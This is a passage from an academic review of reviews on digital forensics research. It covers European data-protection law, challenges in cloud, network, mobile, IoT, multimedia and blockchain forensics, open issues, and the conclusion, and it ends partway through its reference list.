forensics and respective technology readiness, the applicable regulatory frameworks should beconsidered as well. As seen in [195], integrating digital foren- sic readiness as a component in data protection legislation could improve actual practices across different sectors and countries. In particular, this section highlights the regulatory require- ments of working with data in Europe and in the European Union. To facilitate digital forensic readiness, tools should be developed and used in line with legal requirements, with special attention to the individual's privacy. 1) PRIVACY IN EUROPE States have numerous responsibilities concerning the protec- tion of their citizens. Although the protection of privacy (in its various forms) is important, it represents but one of the duties states should ful l [217]. Other prominent duties relate to the need to protect the life and property of citizens, to prevent disorder, to ensure that justice occurs where individuals have been the victim of criminal activity and to protect national security both of ine and online [218]. In modern western societies, it is often impossible to guarantee the exercise and protect such rights and in an absolute manner to all individuals all of the time due to competing interests of stakeholder groups. Respectively, privacy is only one of such values next to, e.g., security and the need for public order. To ensure security, the state likely has to take measures that may infringe upon the privacy of individuals [219]. This entails the acquisition of data or the conduct of surveillance to prevent inter alia acts of terrorism or crime. These activities clearly interfere with and limit the privacy of citizens but do so for desirable reasons. However, interference with such competing interests should be balanced, and the rights and freedoms of all groups in society should be respected to the greatest extent [217]. Respectively, the need to balance the privacy and security interests implies that security measures that infringe upon individual privacy are not acceptable unless they really are intended to meet a need that is relating to the protection the rights and interests of others. Where such VOLUME 10, 2022 25481 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews justi cation does not exist, infringement of individual privacy would not be acceptable. 2) DATA PROTECTION IN EUROPE In consonance with the individual's data protection inter- est and society's own protective endeavours toward ghting crime and securing national security, the Council of Europe and European Union developed a common framework to be observed by technology developers, security agencies, including Police, and criminal justice system. The most rel- evant instruments of the Council of Europe relating to the processing of data as evidence are: 1) the European Conven- tion for the Protection of Human Rights and Fundamental Freedoms (ECHR) in particular with reference to the protec- tion of the rights to privacy and due process, 2) the Council of Europe Convention on Cybercrime, as this Convention remains the main and only international treaty which de nes the substantive elements of cybercrimes [220], 3) the Council of Europe Convention on Mutual Assistance in Criminal Matters, and its 1978 Protocol [221], and 4) the Electronic Evidence Guide [222]. A second protocol concerning the ``Enhanced international cooperation on cybercrime and electronic evidence'' is also in development [223]. In European Union Art. 4 (2) of the Treaty on the Euro- pean Union (TEU) states that national security is the sole responsibility of each Member State. To facilitate a harmo- nized approach to national security, the EU adopted several Directives and other legislative pieces in connection with criminal matters such as: 1) Charter of Fundamental Rights of the European Union, art 7 and 8. 2) 2016/679 General Data Protection Regulation 3) Statement of the Article 29 Working Party, Data protection and privacy aspects of cross- border access to electronic evidence, Brussels, 29 November 2017. 4) 2016/680/EU Law Enforcement Directive [224] 5) 2014/41/EU European Investigation Order Directive 6) EU 2000 Convention on mutual assistance in criminal matters 7) 910/2014 eIDAS Regulation [225] 8) Electronic evidence - a basic guide for First Responders Good prac- tice material for CERT rst responders by ENISA, and 9) E-evidence package [226] To rationalize the functioning and limit the increasing num- ber of legal provisions, Regulation 2016/95 repealed certain acts in the eld of police cooperation and judicial cooperation in criminal matters [227]. LEAs performing digital forensics have con dentiality case levels depending on the severity of the crime. The forensic examiners sign a special con- dentiality agreement regarding data protection upon their employment. There are policies regarding data protection, all the case relevant data is kept only to the internal network, which is protected with the use of all the necessary measures (Secure Connections, encryption, controlled access at the physical location). The forensic examination equipment is not connected to the internet when examinations are conducted. The data in question in digital forensics is referred to as elec- tronic evidence, de ned as ``any information (comprising theoutput of analogue devices or data in digital format) of poten- tial probative value that is manipulated, generated through, stored on or communicated by any electronic device'' [228]. Respectively, to use such data, speci c rules concerning the gathering and use of (digital) evidence should be adhered to as well. Electronic evidence is admissible in courts when the following sets of rules are adhered to: 1) general rules and principles concerning due process in criminal proceedings; 2) general rules of evidence in criminal proceedings and; 3) speci c rules relating to electronic evidence in criminal proceedings [229]. There are both current, and to-be adopted elements of the applicable legal framework, but it must be underlined that as of now, there is no comprehensive international or European legal framework providing rules relating to evidence [230]. From these documents, ve overarching principles can be deducted concerning the acquisition and use of electronic evi- dence. These are: data integrity, audit trail, specialist support, appropriate training, and legality [231]. National criminal procedure codes (referred above) contain further, speci c provisions regarding the record and applicability of digital evidence in criminal procedures. V. DISCUSSION In Section III, we provided a topic-based taxonomy of the digital forensics literature. In what follows, we recall the chal- lenges identi ed in each category and provide some strategies to overcome them. A. THE ROAD AHEAD IN DIGITAL FORENSICS' TOPICS After revising the challenges collected in cloud forensics, most of them are closely related to data management. More concretely, data acquisition, logging, limited access to foren- sic data, cross-border data access and exchange are vital parameters in cloud forensics. In terms of log management, Marty [232] proposed using log management architecture and the guidelines for application logging in SaaS service model using technologies such as Django, Javascript, Apache, and MySQL. A centralised logging scheme was proposed by Trenwith and Venter [233] to accelerate the investigation process and provide forensic readiness. Patrascu and Patri- ciu [234] proposed a scheme to monitor various parallel activities in a cloud environment. In addition to the pre- vious works, several authors have devoted efforts towards ef cient and secure evidence management in the cloud [235][237], including the use of blockchain such as seen in [238]. We believe that ef cient evidence and logging col- lection mechanisms paired with secure and veri able man- agement of such evidence are crucial to guarantee sound cloud forensic investigations. Network traf c forensics is a long-standing domain with numerous research efforts and tools. The main gaps that currently exist and on which future efforts shall be focused are related to the volume of the traf c, the different protocols that emerge mainly due to the IoT rise, and the fact that traf c is encrypted in most cases. As the use of computer systems and 25482 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews the internet grows exponentially, the network traf c size to be analysed to conduct a forensics investigation rises. Methods that can ef ciently analyse voluminous traces of network traf c are in high demand. Additionally, the heterogeneity of network traf c protocols increases the effort required to collect evidence from all available sources. Last but not least, the main challenge that network foren- sics research faces nowadays is encrypted traf c. When dig- ital forensic evidence acquisition happens at an intermediate node of the communication path, it is expected for the traf c payload to be encrypted, and methods capable of extracting information under such conditions are required. Filesystems, Memory, and Data Storage forensics have attracted the research community's attention, as they are an abundant source of digital evidence. As discussed in Section III-E, the main challenge of these domains lies in the fact that there exist a large number of les and data contained in them. Thus, the efforts should focus on big data analysis and data mining techniques to extract the relevant investigation data from the vast amount of unrelated or redun- dant digital objects. Another issue is the case of distributed lesystem and databases or data stores, or when the foren- sic analysis should be conducted on the cloud. In the latter case, besides the specialised tools and methods, it also chal- lenges collaboration and cooperation with the cloud service providers. Finally, most research works and tools are bound to speci c system architecture, OS, or hardware implemen- tation, so they have the drawback of becoming cumbersome to adjust existing solutions to new use cases and problems. In this context, more generic approaches that allow tool reuse in different cases are necessary. The recovery of digital evidence from portable and/or mobile devices is the focus of mobile forensics (MF), a sub-branch of digital forensics. Seizure, acquisition, and examination/analysis are the three categories that mobile forensics processes fall into. Several challenges exist con- cerning mobile forensics, as presented in III-C. In the MF domain, the variety of embedded OSs with shorter prod- uct life cycles and the numerous smartphone manufacturers worldwide present signi cant challenges for applying sound forensics approaches. MF, in general, present a variety of challenges such as problems with data (anonymity-enforced browsing and other anonymity services, and the considerable volume of data acquired during an investigation), availability of forensic tools (MF research approaches have long focused on acquisition techniques, while minor importance was given to the other phases of MF investigative process) and security- oriented concerns (development of new and more sophisti- cated anti-forensic methods from mobile manufacturers). It is worth noting that MF is confronted with signi cant chal- lenges regarding the overall MF processes' focus. For exam- ple, it is unclear whether investigation procedures should be model-speci c for each device or generic enough to form a standardized set of forensics procedures guidelines. Another critical issue is the requirement to perform live forensics (mobile devices should be powered on). Finally, due to thesecurity features built into modern mobile devices, an inves- tigator must break into the device using an exploit that will almost certainly alter the data. While the widespread adoption of IoT devices and IoT- related applications has improved data availability and oper- ational excellence, it has also introduced new security and forensics challenges. As presented in Section III-D, several challenges exist concerning IoT forensics. Such challenges include managing multiple streams of data sources, the com- plicated three-tier architecture of IoT and the lack of stan- dardized systems for capturing real-time logs and storing them in a valid uniform form. The preparation of highly detailed reports of all information gathered, its correspond- ing representation, and the lack of standardized systems for capturing real-time logs also serve as barriers to establishing sound IoT-related forensics mechanisms. Data encryption trends are also posing new challenges for IoT forensic inves- tigators, and cryptographically protected storage systems are arguably one of the most signi cant roadblocks to effec- tive digital forensic analysis. Interoperability and availability issues related to the vast number of connected IoT devices, the Big Data nature of IoT forensics evidence, and IoT forensics evidence's various security storage challenges also represent signi cant IoT-related forensics challenges. Finally, the IoT forensics domain faces several regulatory challenges, partic- ularly those relating to data ownership in the cloud as de ned by regional laws. As seen in Section III-G, multimedia forensics is one of the most explored topics, according to the number of publications. Overall, while most authors focus on image forgery detection, anti-forensics is one of the most challeng- ing problems. In this regard, more efforts should be devoted to counter anti-forensic mechanisms (i.e., as part of a global digital forensics concern) and methodologies to capture novel criminal trends with the help of sophisticated real-time object detection and classi cation systems. In addition, multi-layer systems and ontologies should be designed to cope with mul- tiple threats at once, paired with the appropriate benchmarks to evaluate them. In parallel, the issues related to the vast amount of data to be processed should be minimised by proposing more ef cient data storage and indexing mech- anisms and introducing algorithms that can process, e.g., compressed data. Following such research paths and com- bining them with the proper legislation and standardisation mechanisms will improve the success of multimedia digital forensics investigations. Blockchain forensics is a relatively new domain since blockchain technology accounts for a decade. In general, it has to be understood that the need for blockchain foren- sics methods is expected to grow in the coming years. As discussed in Section III-F current efforts focus on the examination of available data on public blockchain systems. One of the main challenges encountered is to provide ef - cient methods to conduct such analysis. The data on public ledgers continuously grows, while the storage structure dif- fers amongst different implementations. Developing methods VOLUME 10, 2022 25483 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews and tools that can ef ciently analyse data across commonly used blockchain platforms is required. Moreover, forensic analysis methods for blockchain systems' nodes will enable more thorough investigations with more detailed results for public and private blockchain systems. Finally, given the ris- ing popularity of privacy enabled blockchain systems such as Monero or ZCash, additional effort will be required to support forensic investigations on cases that include interactions on such systems. B. OPEN ISSUES AND FUTURE TRENDS 1) FORENSIC READINESS AND REPORTING Given the continuous evolution of cybercrime and its harm- ful capacities, preventive strategies are paramount to ght criminal activities. The latter implies the need to reinforce digital forensic strategies at different levels, including guide- lines, regulations, research and training to implement forensic readiness holistically. According to our literature analysis, one of the key points to reinforce the actual state of practice is the de nition of interoperable and easy-to-adopt legislations since current ones cannot cope with the increasing sophis- tication and the ubiquitous nature of cybercrime. Therefore, it is crucial to devote efforts towards, e.g., interoperable cross- border models with their corresponding dissemination and training procedures, which all practitioners may adopt to accelerate investigations. It is also relevant to stress the neces- sity of appropriate forensic readability and reporting. First, effective communication between all the actors involved in a forensic investigation is essential to maximise the guarantees in court. Second, the proper documentation of investigations provides valuable feedback for future investigations, enhanc- ing forensic readiness strategies. Third, the de nition of a common reporting framework can accelerate investigations in which sometimes speed is crucial due to, e.g., the pos- sible volatility of evidence or to reduce harm. To this end, we proposed a forensic reporting content representation by following the common denominators found in the literature in Section III. We argue that the devotion of more efforts on this nal part of the forensic ow will enrich investigations with valuable feedback and successful prosecution guarantees. 2) FORENSIC PREPAREDNESS AND STANDARDS While in Section IV we provided an overview of digital forensics standards, unfortunately, they do not suf ce current needs. To name just two which are standing out on the tip of the iceberg, cloud and mobile related investigations need to have some standards on how to be performed. Addressing the need for mobile forensics, FORMOBILE6has initiated a broad dialogue and is developing a draft CENELEC Work- shop Agreement to ll in this gap. However, due to the speci cities of cloud, IoT, drones, etc., similar actions are expected in the near future. Beyond standards and methods, there is a de nite need from industry players, developers, system administrators etc., 6https://formobile-project.eu/to foster a culture of forensic preparedness. Essentially, every organisation and resource provider must understand that its products and services are expected to suffer a successful cyber attack. Therefore, despite the countermeasures, recov- ery methods, and mitigation strategies, they need to imple- ment policies and mechanisms to facilitate digital forensics. If the latter are not well-placed, while business continuity may not be severely harmed, one may not understand why and how the security event occurred, what needs to change, or miss even important evidence of the threat actor. 3) DECENTRALISATION AND IMMUTABILITY The wide adoption of distributed platforms, e.g. blockchain solutions [80] and distributed storage and lesystems, imply signi cant challenges for digital forensics [239], [240]. Some of these structures have strong privacy guarantees and can be leveraged to ex ltrate data, orchestrate malicious cam- paigns [241][244], or siphon fraudulent payments [245]. Traditional logging mechanisms and access control systems allow an investigator to assess who, when, how or even from where are not relevant for many of these technologies. As a result, they are continuously abused by threat actors. These huge obstacles for digital forensics require further research on the eld and the development of more targeted tools to extend the capabilities of digital investigators. In this regard, while the use of distributed platforms is not exempt from potential issues [240], they can also be potentially used to leverage community-based intelligence against threats and to leverage auditable forensic investigations [82], [246][248]. Following such an idea and in order to accelerate the response towards sophisticated threats and international campaigns, the community is devoting research efforts towards federated learning models [249], [250], and other emerging topics such as cognitive security [251], [252]. 4) DATA PROTECTION AND ETHICS IN CRIMINAL INVESTIGATIONS Ransomware may be regarded as the most obvious case of exploiting cryptographic primitives for malicious acts; nev- ertheless, this is not by any chance the only. Threat actors and cybercriminals, for instance, use encrypted and even covert channels to communicate, further hindering investi- gations. The latter has sparked a huge debates as many are promoting concepts such as responsible encryption7with the adoption of, e.g., weakened encryption, cryptographic schemes such as key escrow, backdooring of cryptographic primitives etc. [253][256]. While they may facilitate dig- ital investigations, essentially, they undermine the scope of cryptography and security, opening the door for many inter- pretations on what lawful interception is, when it can be performed, by whom, let alone the exploitation of the mech- anisms by already malicious actors as the backdoor would be already implanted. The debate is undergoing and spans 7https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j- rosenstein-delivers-remarks-encryption-united-states-naval 25484 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews multiple sectors beyond digital forensics. While fostering such approaches may greatly bene t digital forensics, the ethical and legal implications hinder such adoption and are received by the security community with scepticism. As discussed, anti-forensics methods are a challenge for almost all domains of digital forensics. Nevertheless, with the growing adoption of TPM and TEE, these challenges can be signi cantly augmented. For instance, as illustrated by Dunn et al. [257] ransomware can exploit these technologies to render decryption key extraction impossible. Nevertheless, it is clear that these technologies introduce signi cant chal- lenges for digital investigators since they may deprive them of access to critical information. In this regard, it is essential to study methods for, e.g. live forensics in the presence of TPM and TEE and to explore how the missing information can be compensated. 5) AUTOMATION AND EXPLAINABILITY The continuous increase in reported cybercrimes apart from the impact on the victims implies a lot of effort from investi- gators to analyse the cases. Therefore, automation of digital forensics inevitably becomes a need. While automated meth- ods for collecting log les and algorithms to identify anoma- lies or even correlating some events may exist, this does not practically translate to automated digital forensics. Even if one does not consider APT attacks, one must understand that each case has particularities differentiating it from the others. Moreover, a digital investigator has to ll in the gaps of missing information that the attacker managed to cover, including those that security mechanisms failed to record or those erroneously reported. The above implies the develop- ment of advanced machine learning and AI algorithms and tools that will underpin future digital forensics investigations. An important part of these systems is undoubtedly under- standing the scope of the investigation and the explainability of the results [258], which is critical to assess the impact of current investigations and quantify their effectiveness [14], a critical step to ensure the implementation of the proper mea- sures. The latter is a crucial part of AI and machine learning modules that have to be introduced as in order for a piece of evidence to be admissible in a court of law, one has to justify not only how and from where it has been collected but to also prove the relevance to the case, how it was used, and why it is linked with the rest of the evidence. In essence, future digital forensics systems would have to argue and reason on the collected information in a human-readable manner. The latter is a huge step forward compared to the existing state where systems prioritise log events and present the analysts with known malicious patterns in the logs, malicious binaries, or connections that deviate speci c norms. 6) FORENSIC GUIDELINES AND BEST PRACTICES One of the main strategies to reduce the impact of cybercrime is to implement the recommendations of the security guide- lines and directives developed by agencies such as ENISA and NIST. The current threat landscape [6], which includesransomware, malware, and threats against data availability and veracity, affect digital forensics in different dimensions, regardless of the topic. NIST recently published a state of the art analysis of cloud-related challenges [34], which is aligned with the claims collected by in the cloud-based digital forensics literature reviews state in Section III-A. In the case of networks, ENISA elaborated an extensive set of security objectives and discussed them along with their corresponding recommendation measures in the topics of electronic commu- nications [259] as well as 5G networks [260]. NIST provides security guidelines for managing mobile devices in their draft SP 800-124 (rev2) [261]. The recommendations include scenarios from organization-provided to personally-owned devices and describes technologies and strategies that can be used as countermeasures and mitigations. In the context of IoT, NIST released a set of documents related to IoT device cybersecurity, covering aspects from the design and manu- facturing of the components to their disposal [262]. In par- allel, ENISA also proposed a comprehensive set of security guidelines targeting all the entities involved in the supply chain of IoT to improve security decisions when designing, building, deploying, and assessing IoT technologies [263]. Concerning data storage and data processing, several guide- lines have been proposed during the past years to reduce data breaches [264], and the proper deployment of data storage mechanisms that enable privacy by design [265][267], and forensic readiness [268]. Finally, despite the existence of such guidelines, forensic frameworks accommodating procedures adapted to novel types of cybercrime such as in e.g. social networks [269], and the proper review and evaluation of an investigation process, are necessary to assess the quality of forensic investigations [270]. VI. CONCLUSION AND FINAL REMARKS The digitisation of our daily lives is a double-edged sword as beyond the myriad of advantages and comforts it pro- vides, it introduces security and privacy issues. Motivated by the lack of a general view of the digital forensics ecosys- tem, mainly because different topics are explored in an isolated way and aiming to answer several research ques- tions/concerns, this manuscript seeks to ll a literature gap by proposing a review of reviews in the eld of digital forensics. Following a thorough research methodology, we identi ed the main digital forensics topics. We performed a taxonomy by documenting the current state of the art and practice and the main challenges in each of them. Moreover, we anal- ysed these challenges with a cross-domain perspective to highlight their relevance according to the times they were discussed in the literature. According to the outcomes (i.e. see Section III-I), such analysis provided us with enough evi- dence to prove that the digital forensics community could bene t from closer collaborations and cross-topic research since it appears that researchers are trying to nd solutions to the same problems in parallel, sometimes without noticing it. By merging the information of Table 10and Figure 4, we extracted the amount of cross-domain challenges that VOLUME 10, 2022 25485 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews each topic has in each forensic phase, and reported them in Table 18. As it can be observed, data acquisition along with investigation and forensic analysis are the phases that entail more challenges, according to the research community. If we analyse the data at a topic level, we can observe that IoT has many challenges to overcome in such phases. The same applies to Multimedia and Mobile forensics. Since we focus on the extracted challenges as collected in our literature review, the fact that some challenges have not been high- lighted either at topic or forensic phase level may indicate that researchers and practitioners have not devoted enough effort to them, or perhaps highlights lack of discussion towards them. Such interesting domains include value chain and nancial forensics. Like other domains, the business sector's ongoing digitisation means that sound value chain forensics mechanisms will be almost necessary within any corporate strategy for the years to come. Therefore, the potentially unexplored issues in such cases require proactive initiatives before they become obstacles in the near future. TABLE 18. Limitations per topic according to each phase as depicted in Figure 4. Further to merely listing the state of practice and proposing research directions according to the identi ed challenges, we analysed crucial aspects of digital forensics such as stan- dards, forensic readiness, forensic reporting, and discussed the ethical and legal aspects of data management in Europe in Section IV. The insights gathered from such analysis, which were represented in the form of structured tables, qualitative literature analysis, and a proposed representation of forensic report content, successfully answered the research questions presented in Table 1. Finally, we discussed the main takeaways of this article and showcased several challenges that the digital forensics community will face in the upcoming years in Section V. In this regard, we proposed some ideas to prevent and/or overcome them while recalling the need to design ef cient and cross-domain strategies since the latter will guarantee faster and more robust outcomes, hopefully minimising the impact of criminal activities. Notably, some limitations of our approach are worth men- tioning. Since our article is a review of reviews, we may have missed some recent advances and challenges should these have not yet been collected in recent surveys. More- over, we only considered peer-reviewed journals, which may have lessened our approach's comprehensive and interdisci- plinary nature. However, we opted for this methodology sinceusually, literature reviews are mature and long term works not likely to be published in conferences as they do not require a fast positioning. By discussing the open issues and future trends in digital forensics, and after observing that many of the challenges raised years ago are still not solved, we believe that our literature analysis re ects with high delity the cur- rent state of practice and the potential challenges that may arise in the years to come, providing a fruitful ground of research. The inherent cross-jurisdiction nature of modern cyber- crime paired with the abuse of cutting edge technologies man- dates more coordinated efforts from the security and research community. With the continuously increasing amount of data that have to be analysed, it is straightforward that man- ual analysis is almost at its limits. The use of ne-grained IoCs may signi cantly reduce the effort of the investigator. However, as already discussed, this is not always possible, especially when non-traditional computing devices are used, e.g. IoT, mobile, cloud. As a result, machine learning and arti- cial intelligence are gradually being integrated into the logic of many tools and methods. Nevertheless, the reasoning of the results in an understandable human manner is a cross-domain challenge. Moreover, the standardisation of digital forensics processes for cloud, mobile, IoT, drones, etc., is becoming a high priority since they are an indispensable part of almost all modern digital investigations. Finally, the consensus on developing these standards and the coordinated efforts made over the past few years for countering cybercrime must be leveraged to homogenise the legislation across jurisdictions and facilitate digital investigations. A common answer to the problem and using the same measures would create a strong response against cybercrime and improve response time to security incidents and their analysis. ACKNOWLEDGMENT The content of this article does not re ect the of cial opinion of the European Union. Responsibility for the information and views expressed therein lies entirely with the authors. REFERENCES [1] J. I. Thornton and J. Peterson, ``The general assumptions and rationale of forensic identi cation,'' Modern scienti c evidence: Law Sci. expert testimony, vol. 2, p. 13, 1997. [2] E. Locard, Manuel de Technique Polici re: Les Constats, les Empreintes Digitales, 2nd ed. Paris, France: Payot, 1934. [3] F. L. Wellman and H. M nsterberg, ``The art of cross-examination,'' Amer. Bar Assoc. J., vol. 10, no. 4, p. 249, 1924. [Online]. Available: http://www.jstor.org/stable/25711556 [4] M. Pollitt, ``A history of digital forensics,'' in IFIP International Confer- ence on Digital Forensics. Berlin, Germany: Springer, 2010, pp. 315. [5] (2019). I. G. C. for Innovation. Global Guidelines for Digital Forensics Laboratories . [Online]. Available: https://www.interpol.i nt/content/download/13501/ le/INTERPOL_DFL_Globa% lGuidelinesDigitalForensicsLaboratory.pdf [6] (2021). The European Union Agency for Cybersecurity (ENISA). ENISA Threat Landscape 2021. [Online]. Available: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2021 [7] P. Purnaye and V. Kulkarni, ``A comprehensive study of cloud forensics,'' Arch. Comput. Methods Eng., vol. 29, no. 1, pp. 114, 2021. 25486 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [8] C. Pasquini, I. Amerini, and G. Boato, ``Media forensics on social media platforms: A survey,'' EURASIP J. Inf. Secur., vol. 2021, no. 1, pp. 119, Dec. 2021. [9] K. Nance, H. Armstrong, and C. Armstrong, ``Digital forensics: De ning an education agenda,'' in Proc. 43rd Hawaii Int. Conf. Syst. Sci., 2010, pp. 110. [10] A. M. Marshall, ``Quality standards and regulation: Challenges for digital forensics,'' Meas. Control, vol. 43, no. 8, pp. 243247, Oct. 2010. [11] P. S. Chen, L. M. Tsai, Y.-C. Chen, and G. Yee, ``Standardizing the construction of a digital forensics laboratory,'' in Proc. 1st Int. Work- shop Systematic Approaches Digit. Forensic Eng. (SADFE), Nov. 2005, pp. 4047. [12] A. Varol and Y. U. S nmez, ``Review of evidence collection and protec- tion phases in digital forensics process,'' Int. J. Inf. Secur. Sci., vol. 6, no. 4, pp. 3946, 2017. [13] A. H. Lone and R. N. Mir, ``Forensic-chain: Blockchain based digital forensics chain of custody with PoC in hyperledger composer,'' Digit. Invest., vol. 28, pp. 4455, Mar. 2019. [14] R. E. Overill and J. Collie, ``Quantitative evaluation of the results of digital forensic investigations: A review of progress,'' Forensic Sci. Res., vol. 6, no. 1, pp. 1318, Jan. 2021. [15] K. A. Z. Arif n and F. H. Ahmad, ``Indicators for maturity and readiness for digital forensic investigation in era of industrial revolution 4.0,'' Comput. Secur., vol. 105, Jun. 2021, Art. no. 102237. [16] M. Fire and C. Guestrin, ``Over-optimization of academic publishing metrics: Observing Goodhart's law in action,'' GigaScience, vol. 8, no. 6, Jun. 2019. [17] H. Hunt, A. Pollock, P. Campbell, L. Estcourt, and G. Brunton, ``An intro- duction to overviews of reviews: Planning a relevant research question and objective for an overview,'' Systematic Rev., vol. 7, no. 1, pp. 19, Dec. 2018. [18] J. E. McKenzie and S. E. Brennan, ``Overviews of systematic reviews: Great promise, greater challenge,'' Systematic Rev., vol. 6, no. 1, pp. 14, Dec. 2017. [19] E. Aromataris, R. Fernandez, C. M. Godfrey, C. Holly, H. Khalil, and P. Tungpunkom, ``Summarizing systematic reviews: Methodological development, conduct and reporting of an umbrella review approach,'' Int. J. Evidence Based Healthcare, vol. 13, no. 3, pp. 132140, 2015. [20] M. Pollock, R. M. Fernandes, D. Pieper, A. C. Tricco, M. Gates, A. Gates, and L. Hartling, ``Preferred reporting items for overviews of reviews (PRIOR): A protocol for development of a reporting guideline for overviews of reviews of healthcare interventions,'' Systematic Rev., vol. 8, no. 1, pp. 19, Dec. 2019. [21] D. Denyer and D. Tran eld, ``Producing a systematic review,'' in The Sage Handbook of Organizational Research Methods. Los Angeles, CA, USA: SAGE, 2009, pp. 671689. [22] R. Pranckut e, ``Web of science (WoS) and scopus: The titans of bibli- ographic information in Today's academic world,'' Publications, vol. 9, no. 1, p. 12, Mar. 2021. [23] J. vom Brocke, A. Simons, K. Riemer, B. Niehaves, R. Plattfaut, and A. Cleven, ``Standing on the shoulders of giants: Challenges and rec- ommendations of literature search in information systems research,'' Commun. Assoc. Inf. Syst., vol. 37, no. 1, p. 9, 2015. [24] M. E. Alex and R. Kishore, ``Forensics framework for cloud computing,'' Comput. Elect. Eng., vol. 60, pp. 193205, May 2017. [25] M. Khanafseh, M. Qatawneh, and W. Almobaideen, ``A survey of various frameworks and solutions in all branches of digital forensics with a focus on cloud forensics,'' Int. J. Adv. Comput. Sci. Appl., vol. 10, no. 8, pp. 610629, 2019. [26] A. Pichan, M. Lazarescu, and S. T. Soh, ``Cloud forensics: Technical challenges, solutions and comparative analysis,'' Digit. Invest., vol. 13, pp. 3857, Jun. 2015. [27] G. Palmer et al., ``A road map for digital forensic research,'' in Proc. 1st Digit. Forensic Res. Workshop, New York, NY, USA, 2001, pp. 2730. [28] K. Ruan, J. Carthy, T. Kechadi, and I. Baggili, ``Cloud forensics de ni- tions and critical criteria for cloud forensic capability: An overview of survey results,'' Digit. Invest., vol. 10, no. 1, pp. 3443, 2013. [29] S. Park, Y. Kim, G. Park, O. Na, and H. Chang, ``Research on digital forensic readiness design in a cloud computing-based smart work envi- ronment,'' Sustainability, vol. 10, no. 4, p. 1203, Apr. 2018. [30] S. Simou, C. Kalloniatis, S. Gritzalis, and H. Mouratidis, ``A survey on cloud forensics challenges and solutions,'' Secur. Commun. Netw., vol. 9, no. 18, pp. 62856314, Dec. 2016.[31] A. Aminnezhad, A. Dehghantanha, M. T. Abdullah, and M. Damshenas, ``Cloud forensics issues and opportunities,'' Int. J. Inf. Process. Manage., vol. 4, no. 4, pp. 7685, Jun. 2013. [32] N. H. A. Rahman, and K.-K. R. Choo, ``A survey of information security incident handling in the cloud,'' Comput. Secur., vol. 49, pp. 4569, Mar. 2015. [33] B. Manral, G. Somani, K.-K.-R. Choo, M. Conti, and M. S. Gaur, ``A systematic survey on cloud forensics challenges, solutions, and future directions,'' ACM Comput. Surv., vol. 52, no. 6, pp. 138, Nov. 2020. [34] N. I. of Standards and Technology. (2020). Nistir 8006 NIST Cloud Computing Forensic Science Challenges. [Online]. Available: https://nvlpubs.nist.gov/nistpubs/ir/2020/NIST.IR.8006.pdf [35] A. Alenezi, H. F. Atlam, and G. B. Wills, ``Experts reviews of a cloud forensic readiness framework for organizations,'' J. Cloud Comput., vol. 8, no. 1, Dec. 2019. [36] E. S. Pilli, R. C. Joshi, and R. Niyogi, ``Network forensic frame- works: Survey and research challenges,'' Digit. Invest., vol. 7, nos. 12, pp. 1427, Oct. 2010. [37] (2020). N. T. S. Coalition. Cybersecurity Report 2020. [Online]. Avail- able: https://www.ntsc.org/assets/pdfs/cyber-security-report-2020.pdf [38] C. Patsakis, F. Casino, N. Lykousas, and V. Katos, ``Unravelling Ariadne's thread: Exploring the threats of decentralised DNS,'' IEEE Access, vol. 8, pp. 118559118571, 2020. [39] N. Hoque, M. H. Bhuyan, R. C. Baishya, D. K. Bhattacharyya, and J. K. Kalita, ``Network attacks: Taxonomy, tools and systems,'' J. Netw. Comput. Appl., vol. 40, pp. 307324, Apr. 2014. [40] S. Khan, A. Gani, A. W. A. Wahab, M. Shiraz, and I. Ahmad, ``Network forensics: Review, taxonomy, and open challenges,'' J. Netw. Comput. Appl., vol. 66, pp. 214235, May 2016. [41] A. Nisioti, A. Mylonas, P. D. Yoo, and V. Katos, ``From intrusion detec- tion to attacker attribution: A comprehensive survey of unsupervised methods,'' IEEE Commun. Surveys Tuts., vol. 20, no. 4, pp. 33693388, 4th Quart., 2018. [42] F. Sharevski, ``Towards 5G cellular network forensics,'' EURASIP J. Inf. Secur., vol. 2018, no. 1, p. 8, Dec. 2018. [43] D. Takahashi, Y. Xiao, Y. Zhang, P. Chatzimisios, and H.-H. Chen, ``IEEE 802.11 user ngerprinting and its applications for intrusion detection,'' Comput. Math. Appl., vol. 60, no. 2, pp. 307318, Jul. 2010. [44] L. F. Sikos, ``Packet analysis for network forensics: A comprehensive sur- vey,'' Forensic Sci. Int., Digit. Invest. , vol. 32, Mar. 2020, Art. no. 200892. [45] I. R. Adeyemi, S. A. Razak, and N. A. N. Azhan, ``A review of current research in network forensic analysis,'' Int. J. Digit. Crime Forensics, vol. 5, no. 1, pp. 126, Jan. 2013. [46] A. A. Ahmed and N. A. K. Zaman, ``Attack intention recognition: A review,'' IJ Netw. Secur., vol. 19, no. 2, pp. 244250, 2017. [47] H.-C. Chu, D.-J. Deng, and H.-C. Chao, ``Potential cyberterrorism via a multimedia smart phone based on a Web 2.0 application via ubiquitous Wi-Fi access points and the corresponding digital forensics,'' Multimedia Syst., vol. 17, no. 4, pp. 341349, Jul. 2011. [48] K. Barmpatsalou, T. Cruz, E. Monteiro, and P. Simoes, ``Current and future trends in mobile device forensics: A survey,'' ACM Comput. Surv., vol. 51, no. 3, pp. 131, 2018. [49] A. Farjamfar, M. T. Abdullah, R. Mahmod, and N. Izura Udzir, ``A review on mobile device's digital forensic process models,'' Res. J. Appl. Sci., Eng. Technol., vol. 8, no. 3, pp. 358366, Jul. 2014. [50] K. Barmpatsalou, D. Damopoulos, G. Kambourakis, and V. Katos, ``A critical review of 7 years of mobile device forensics,'' Digit. Invest., vol. 10, no. 4, pp. 323349, Dec. 2013. [51] X. Wan, J. He, G. Liu, N. Huang, X. Zhu, B. Zhao, and Y. Mai, ``Survey of digital forensics technologies and tools for Android based intelligent devices,'' Int. J. Digit. Crime Forensics, vol. 7, no. 1, pp. 125, Jan. 2015. [52] J. Hou, Y. Li, J. Yu, and W. Shi, ``A survey on digital forensics in Internet of Things,'' IEEE Internet Things J., vol. 7, no. 1, pp. 115, Jan. 2020. [53] M. 